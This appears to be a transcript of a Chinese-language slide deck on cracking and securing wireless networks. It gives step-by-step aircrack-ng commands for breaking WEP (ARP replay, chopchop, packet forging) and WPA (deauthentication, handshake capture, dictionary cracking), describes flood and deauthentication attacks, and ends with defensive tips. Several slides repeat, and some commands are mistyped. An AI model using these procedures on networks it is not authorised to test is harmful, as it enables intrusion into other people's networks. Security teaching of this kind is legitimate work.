Transcript 无线的破解
无线的破解与安全
姜辉
提纲
相关背景
WEP的破解(1)
WPA的破解
无线安全
相关背景
无线网卡的选择
芯片。Athetos ,Prism,Ralink (USB)
无线网卡的硬件/固件版本
无线网卡的功率及规格
基本知识
SSID(Service Set Identifier,服务集标识符)
一个唯一的标识符,最大长度32
WAP(wireless Application Protocol,无线应用
协议)
AP((wireless Access Point)) 无线接入点
相关背景
几个比较好的无线破解系统(Linux)
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者
相关背景
几个比较出名linux系统
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
相关背景
几个比较出名linux系统
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
WEP破解技术(1)
Ifconfig –a wlan0 up
载入无线网卡的驱动程序
首先要在vmware中连接
探测无线AP的信息
airmon-ng start wlan0 监控频道
成功后会开启一个监控网卡,如 mon0
airodump–ng –w dump –channel 6 mon0
aireplay-ng -3 –b ap’s MAC –h client’s MAC –x
1024 mon0
aircrack-ng –x –f 2 dump-01.cap
WEP破解技术(2)
Ifconfig –a wlan0 up
载入无线网卡的驱动程序
首先要在vmware中连接
探测无线AP的信息
airmon-ng start wlan0 监控频道
成功后会开启一个监控网卡,如 mon0
airodump –ng –ivs –c 监控频道–w dump –
channel 6 mon0
aireplay-ng -1 0 –e ap’s essid ap’s MAC –h
client’s MAC (网卡) –x mon0
WEP破解技术(2)
aireplay-ng -4 –b AP’s MAC –h client’s MAC
mon0
Chopchop 攻击
生产可用的密钥数据流文件
会生产一个cap和一个xor的文件
packetforge-ng –o –a AP’MAC –h client’s MAC k 255.255.255.255 -1 255.255.255.255 –y
fragment xor file –w dump1
airepaly-ng -2 –r dump1 mon0
aircrack-ng dump*.ivs
WAP破解技术
airmon-ng start wlan0
没有正常的加载驱动
Dump为数据包
airodump-ng -w dump –channel 频道 mon0
aireplay-ng -o 攻击次数 AP’s MAC –h client’s
MAC mon0
WPA握手的验证
zcat /pentest/password/dictionaries/ wordlist.txt.Z
>password.txt
生产字典(bt4 自带)
aircrack-ng –w password.txt -z dump01.cap
破解
WEP破解流程
无线的安全
身份验证洪泛攻击
攻击原理
关联的客户端向AP发送大量伪造身份验证请求
当请求超出AP的承载能力时断开与客户的连接
攻击实现
使用看似合法的但是随机生成MAC伪造工作站
向AP发送大量的虚假请求
身份验证失败攻击
攻击原理
关联的客户端向AP伪造客户端无效验证帧
AP将受害客户端更新为状态1
攻击实现
关联客户端伪造某合法客户端向AP发送无效的验证帧
AP认为该验证请求无效
将受害者的状态更新为1
总结
尽量使用相对安全的防御措施
隐藏无线局域网的SSID号码
使用WPA加密
实施MAC地址过滤
进行802.1x认证
控制无线信号的范围